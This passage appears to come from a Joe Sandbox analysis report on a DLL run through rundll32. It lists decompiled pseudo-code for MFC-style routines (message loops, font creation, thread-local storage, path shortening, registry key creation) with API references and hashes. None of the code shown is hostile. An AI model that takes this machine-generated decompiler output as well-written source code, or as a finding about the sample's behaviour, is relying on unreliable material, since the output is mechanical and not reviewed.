                                                                        				_t69 = __ecx;
                                                                        				_v12 = 1;
                                                                        				_v16 = 0;
                                                                        				if((_a4 & 0x00000004) == 0 || (E100202AB(__ecx) & 0x10000000) != 0) {
                                                                        					_t62 = 0;
                                                                        				}
                                                                        				_t42 = GetParent( *(_t69 + 0x1c));
                                                                        				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
                                                                        				_v4 = _t42;
                                                                        				_v8 = E1001F7B7();
                                                                        				L14:
                                                                        				while(1) {
                                                                        					L14:
                                                                        					while(_v12 != 0) {
                                                                        						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                        							while(1) {
                                                                        								L15:
                                                                        								_t45 = E1001FABB();
                                                                        								if(_t45 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								if(_t62 != 0) {
                                                                        									_t53 = _v8->message;
                                                                        									if(_t53 == 0x118 || _t53 == 0x104) {
                                                                        										E100203AD(_t69, 1);
                                                                        										UpdateWindow( *(_t69 + 0x1c));
                                                                        										_t62 = 0;
                                                                        									}
                                                                        								}
                                                                        								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
                                                                        									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
                                                                        									return  *((intOrPtr*)(_t69 + 0x40));
                                                                        								} else {
                                                                        									if(E1001FA27(_v8) != 0) {
                                                                        										_v12 = 1;
                                                                        										_v16 = 0;
                                                                        									}
                                                                        									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L14;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							_push(0);
                                                                        							E1003A098();
                                                                        							return _t45 | 0xffffffff;
                                                                        						}
                                                                        						if(_t62 != 0) {
                                                                        							E100203AD(_t69, 1);
                                                                        							UpdateWindow( *(_t69 + 0x1c));
                                                                        							_t62 = 0;
                                                                        						}
                                                                        						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
                                                                        							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
                                                                        						}
                                                                        						if((_a4 & 0x00000002) != 0) {
                                                                        							L13:
                                                                        							_v12 = 0;
                                                                        							continue;
                                                                        						} else {
                                                                        							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
                                                                        							_v16 = _v16 + 1;
                                                                        							if(_t56 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L13;
                                                                        						}
                                                                        					}
                                                                        					goto L15;
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10021BC0
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021BE7
                                                                        • UpdateWindow.USER32(?), ref: 10021C01
                                                                        • SendMessageA.USER32 ref: 10021C25
                                                                        • SendMessageA.USER32 ref: 10021C3F
                                                                        • UpdateWindow.USER32(?), ref: 10021C85
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021CB9
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                        • String ID:
                                                                        • API String ID: 2853195852-0
                                                                        • Opcode ID: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                        • Instruction ID: 572a0072a054787b928fb31f1bd515718dba8d5f307fe0ba771f0ec6dbe0ec5d
                                                                        • Opcode Fuzzy Hash: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                        • Instruction Fuzzy Hash: AC41D4382047419FD722CF22AC88E5BBAF5FFD1794FA0092DF881951A1D732E945CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E1000943B(void* __ecx) {
                                                                        				intOrPtr _t54;
                                                                        				intOrPtr _t56;
                                                                        				signed int _t72;
                                                                        				signed int _t74;
                                                                        				signed int _t79;
                                                                        				void* _t81;
                                                                        				void* _t85;
                                                                        				void* _t100;
                                                                        				void* _t101;
                                                                        				void* _t103;
                                                                        				signed int _t106;
                                                                        				intOrPtr* _t107;
                                                                        				void* _t109;
                                                                        				void* _t111;
                                                                        				void* _t112;
                                                                        
                                                                        				E10011BF0(0x1003add7, _t109);
                                                                        				_t112 = _t111 - 0x80;
                                                                        				_t54 =  *0x1004c470; // 0x1bfbe703
                                                                        				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
                                                                        				_t101 = __ecx;
                                                                        				 *((intOrPtr*)(_t109 - 0x58)) =  *0x1004b0a0(_t100, _t103, _t85);
                                                                        				 *((intOrPtr*)(_t109 - 0x50)) = 0;
                                                                        				 *((intOrPtr*)(_t109 - 0x54)) = 0x10040430;
                                                                        				_t56 =  *((intOrPtr*)(_t109 + 8));
                                                                        				 *(_t109 - 4) = 0;
                                                                        				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
                                                                        					if(E100090AB(_t109 - 0x54, 0x11) != 0 || E100090AB(_t109 - 0x54, 0xd) != 0) {
                                                                        						_t56 = _t109 - 0x54;
                                                                        						goto L6;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t101 + 0x60)) = 0;
                                                                        					}
                                                                        				} else {
                                                                        					L6:
                                                                        					_t13 = _t56 + 4; // 0x10009a67
                                                                        					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
                                                                        					 *(_t109 - 0x78) = 0x20;
                                                                        					_t105 = lstrlenA(_t109 - 0x30) + 1;
                                                                        					E10010B20(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
                                                                        					 *((intOrPtr*)(_t109 - 0x74)) = E100067FA(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
                                                                        					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
                                                                        					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
                                                                        					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
                                                                        					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
                                                                        					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
                                                                        					_t72 =  *(_t109 - 0x4c);
                                                                        					__eflags = _t72;
                                                                        					_t106 = _t72;
                                                                        					if(_t72 < 0) {
                                                                        						_t106 =  ~_t72;
                                                                        					}
                                                                        					E10029194(_t109 - 0x8c);
                                                                        					 *(_t109 - 4) = 1;
                                                                        					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
                                                                        					asm("cdq");
                                                                        					_t107 = _t101 + 0x60;
                                                                        					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
                                                                        					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
                                                                        					E1003881B(_t107);
                                                                        					_t79 = _t109 - 0x78;
                                                                        					__imp__#420(_t79, 0x10043168, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
                                                                        					__eflags = _t79;
                                                                        					if(__eflags < 0) {
                                                                        						 *_t107 = 0;
                                                                        					}
                                                                        					 *(_t109 - 4) = 0;
                                                                        					E100291EF(_t109 - 0x8c, __eflags);
                                                                        				}
                                                                        				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
                                                                        				 *((intOrPtr*)(_t109 - 0x54)) = 0x1003eb6c;
                                                                        				_t81 = E100293B4(_t109 - 0x54);
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
                                                                        				return E100117AE(_t81,  *((intOrPtr*)(_t109 - 0x10)));
                                                                        			}



















                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10009440
                                                                        • GetObjectA.GDI32(10009A67,0000003C,?), ref: 100094AC
                                                                        • lstrlenA.KERNEL32(?), ref: 100094BD
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10009534
                                                                        • OleCreateFontIndirect.OLEAUT32(00000020,10043168,?), ref: 10009560
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                        • String ID:
                                                                        • API String ID: 4082312370-3916222277
                                                                        • Opcode ID: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                        • Instruction ID: 94df4567bccff522b7d7bd0d545f1ce16673c33dc0c382d35917ea97f1dbbf88
                                                                        • Opcode Fuzzy Hash: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                        • Instruction Fuzzy Hash: C641BA75D01259AFEB10CFE5C885ADDBBB4FF09344F50802AE856EB292E7349A04CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
                                                                        				struct _CRITICAL_SECTION* _v8;
                                                                        				void* __ebp;
                                                                        				void* _t32;
                                                                        				void* _t36;
                                                                        				void* _t37;
                                                                        				signed int _t52;
                                                                        				long* _t59;
                                                                        				struct _CRITICAL_SECTION* _t62;
                                                                        				void* _t64;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t59 = __ecx;
                                                                        				_t1 =  &(_t59[7]); // 0x1004f010
                                                                        				_t62 = _t1;
                                                                        				_v8 = _t62;
                                                                        				EnterCriticalSection(_t62);
                                                                        				_t32 = _a4;
                                                                        				if(_t32 <= 0) {
                                                                        					L20:
                                                                        					LeaveCriticalSection(_t62);
                                                                        				} else {
                                                                        					_t4 =  &(_t59[3]); // 0x3
                                                                        					if(_t32 >=  *_t4) {
                                                                        						goto L20;
                                                                        					} else {
                                                                        						_t64 = TlsGetValue( *_t59);
                                                                        						if(_t64 == 0) {
                                                                        							if(E1003741E(0x10) == 0) {
                                                                        								_t64 = 0;
                                                                        							} else {
                                                                        								_t64 = E10037684(_t34);
                                                                        							}
                                                                        							 *(_t64 + 8) = 0;
                                                                        							 *(_t64 + 0xc) = 0;
                                                                        							_t10 =  &(_t59[5]); // 0x3160d50
                                                                        							_t49 =  *_t10;
                                                                        							_t11 =  &(_t59[6]); // 0x4
                                                                        							 *(_t64 +  *_t11) =  *_t10;
                                                                        							_t59[5] = _t64;
                                                                        							goto L10;
                                                                        						} else {
                                                                        							_t52 = _a4;
                                                                        							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
                                                                        								L10:
                                                                        								_t36 =  *(_t64 + 0xc);
                                                                        								if(_t36 != 0) {
                                                                        									_t16 =  &(_t59[3]); // 0x3
                                                                        									_t49 =  *_t16 << 2;
                                                                        									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
                                                                        								} else {
                                                                        									_t15 =  &(_t59[3]); // 0x3
                                                                        									_t37 = LocalAlloc(0,  *_t15 << 2);
                                                                        								}
                                                                        								if(_t37 == 0) {
                                                                        									LeaveCriticalSection(_v8);
                                                                        									_t37 = E1001CE3B(_t49);
                                                                        								}
                                                                        								 *(_t64 + 0xc) = _t37;
                                                                        								_t20 =  &(_t59[3]); // 0x3
                                                                        								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
                                                                        								_t23 =  &(_t59[3]); // 0x3
                                                                        								 *(_t64 + 8) =  *_t23;
                                                                        								TlsSetValue( *_t59, _t64);
                                                                        								_t52 = _a4;
                                                                        							}
                                                                        						}
                                                                        						_t32 =  *(_t64 + 0xc);
                                                                        						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
                                                                        							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
                                                                        						}
                                                                        						LeaveCriticalSection(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t32;
                                                                        			}













                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
                                                                        • TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
                                                                        • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
                                                                        • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
                                                                        • TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
                                                                        • LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                        • String ID:
                                                                        • API String ID: 784703316-0
                                                                        • Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                        • Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
                                                                        • Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                        • Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E1000F6EA(void* __ebx, void* __ecx) {
                                                                        				void* __ebp;
                                                                        				void* _t28;
                                                                        				void* _t36;
                                                                        				signed char _t37;
                                                                        				intOrPtr _t41;
                                                                        				void* _t42;
                                                                        				void* _t44;
                                                                        				intOrPtr _t45;
                                                                        				void* _t46;
                                                                        
                                                                        				_t39 = __ecx;
                                                                        				_t36 = __ebx;
                                                                        				_t41 =  *((intOrPtr*)(_t46 + 0x10));
                                                                        				if(_t41 == 0) {
                                                                        					_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                        					L14:
                                                                        					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
                                                                        					if(_t42 != 0) {
                                                                        						L7:
                                                                        						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
                                                                        							L18:
                                                                        							return _t42;
                                                                        						}
                                                                        						_push(_t36);
                                                                        						_t37 =  *(_t46 + 0x1c);
                                                                        						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
                                                                        							if((_t37 & 0x00000002) == 0) {
                                                                        								L16:
                                                                        								_push(_t37);
                                                                        								_push(0);
                                                                        								_push(_t42);
                                                                        								goto L17;
                                                                        							}
                                                                        							_t39 = _t42;
                                                                        							if(E100203CE(_t42) != 0) {
                                                                        								goto L16;
                                                                        							}
                                                                        							goto L12;
                                                                        						} else {
                                                                        							L12:
                                                                        							_push(_t37);
                                                                        							_push(_t42);
                                                                        							_push(_t45);
                                                                        							L17:
                                                                        							_t42 = E1000F6EA(_t37, _t39);
                                                                        							goto L18;
                                                                        						}
                                                                        					}
                                                                        					return _t45;
                                                                        				}
                                                                        				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
                                                                        				_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                        				while(_t28 == 0) {
                                                                        					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
                                                                        					if(_t41 == 0 || _t41 == _t45) {
                                                                        						goto L14;
                                                                        					} else {
                                                                        						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
                                                                        						continue;
                                                                        					}
                                                                        				}
                                                                        				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
                                                                        				goto L7;
                                                                        			}













                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParentVisible
                                                                        • String ID:
                                                                        • API String ID: 506644340-0
                                                                        • Opcode ID: 9cb7d17d8843fda3976b61edc90904ffaa5e1937fc9ca20ed80e1097fbab1199
                                                                        • Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
                                                                        • Opcode Fuzzy Hash: 9cb7d17d8843fda3976b61edc90904ffaa5e1937fc9ca20ed80e1097fbab1199
                                                                        • Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				intOrPtr _v8;
                                                                        				CHAR* _t21;
                                                                        				CHAR* _t22;
                                                                        				int _t31;
                                                                        				CHAR* _t33;
                                                                        				intOrPtr _t35;
                                                                        				CHAR* _t40;
                                                                        				void* _t44;
                                                                        				void* _t47;
                                                                        
                                                                        				_t40 = _a4;
                                                                        				_t31 = lstrlenA(_t40);
                                                                        				_t21 = E10038481(_t40, 0, 0) - 1;
                                                                        				_t44 = _t31 - _t21;
                                                                        				_t35 = _t44 + _t40;
                                                                        				_a4 = _t21;
                                                                        				_v8 = _t35;
                                                                        				if(_a8 < _t31) {
                                                                        					if(_a8 >= _t21) {
                                                                        						_t33 =  &(_t40[2]);
                                                                        						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
                                                                        							while( *_t33 != 0x5c) {
                                                                        								_t33 = E100127D1(_t33);
                                                                        							}
                                                                        						}
                                                                        						if(_t44 > 3) {
                                                                        							do {
                                                                        								_t33 = E100127D1(_t33);
                                                                        							} while ( *_t33 != 0x5c);
                                                                        						}
                                                                        						_t22 = _a4;
                                                                        						_t47 = _t33 - _t40;
                                                                        						_t12 =  &(_t22[5]); // 0x5
                                                                        						if(_a8 >= _t47 + _t12) {
                                                                        							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
                                                                        								do {
                                                                        									_t33 = E100127D1(_t33);
                                                                        								} while ( *_t33 != 0x5c);
                                                                        							}
                                                                        							 *((char*)(_t47 + _t40)) = 0;
                                                                        							lstrcatA(_t40, "\\...");
                                                                        							_t21 = lstrcatA(_t40, _t33);
                                                                        						} else {
                                                                        							_push(_v8);
                                                                        							goto L14;
                                                                        						}
                                                                        					} else {
                                                                        						if(_a12 == 0) {
                                                                        							_t35 = 0x1003da51;
                                                                        						}
                                                                        						_push(_t35);
                                                                        						L14:
                                                                        						_t21 = lstrcpyA(_t40, ??);
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}













                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                          • Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
                                                                          • Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493
                                                                        • lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                        • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
                                                                        • lstrcatA.KERNEL32(?,\...), ref: 10024B63
                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 10024B67
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
                                                                        • String ID: \...
                                                                        • API String ID: 1604900594-1167917071
                                                                        • Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                        • Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
                                                                        • Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                        • Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E100304C6(void* __ecx) {
                                                                        				struct tagMSG _v28;
                                                                        				void* __ebp;
                                                                        				int _t21;
                                                                        				intOrPtr _t24;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				void* _t39;
                                                                        				int _t40;
                                                                        
                                                                        				_push(0);
                                                                        				_t39 = __ecx;
                                                                        				_t40 = 0xf;
                                                                        				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
                                                                        					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
                                                                        					if(_t21 != 0) {
                                                                        						DispatchMessageA( &_v28);
                                                                        						_push(0);
                                                                        						continue;
                                                                        					}
                                                                        					return _t21;
                                                                        				}
                                                                        				_t24 =  *((intOrPtr*)(_t39 + 0x68));
                                                                        				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
                                                                        				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
                                                                        				SetRectEmpty(_t39 + 0xc);
                                                                        				 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                                        				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
                                                                        				 *((intOrPtr*)(_t39 + 0x24)) = 0;
                                                                        				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
                                                                        				 *((intOrPtr*)(_t39 + 0x80)) = 0;
                                                                        				_t38 = E100220EE(_t40, GetDesktopWindow());
                                                                        				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
                                                                        					_push(3);
                                                                        				} else {
                                                                        					_push(0x403);
                                                                        				}
                                                                        				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
                                                                        				_t33 = E10029068();
                                                                        				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
                                                                        				return _t33;
                                                                        			}












                                                                        APIs
                                                                        • GetMessageA.USER32 ref: 100304E5
                                                                        • DispatchMessageA.USER32 ref: 100304F8
                                                                        • PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                        • SetRectEmpty.USER32(?), ref: 10030528
                                                                        • GetDesktopWindow.USER32 ref: 10030540
                                                                        • LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                        • GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                        • String ID:
                                                                        • API String ID: 1192691108-0
                                                                        • Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                        • Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
                                                                        • Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                        • Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100358C8(intOrPtr __ecx) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				void* _v16;
                                                                        				int _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t32 = __ecx;
                                                                        				_v24 = __ecx;
                                                                        				_v16 = 0;
                                                                        				_v8 = 0;
                                                                        				_v12 = 0;
                                                                        				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                        					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                        				}
                                                                        				if(_v8 != 0) {
                                                                        					RegCloseKey(_v8);
                                                                        				}
                                                                        				if(_v12 != 0) {
                                                                        					RegCloseKey(_v12);
                                                                        				}
                                                                        				return _v16;
                                                                        			}










                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                        • RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
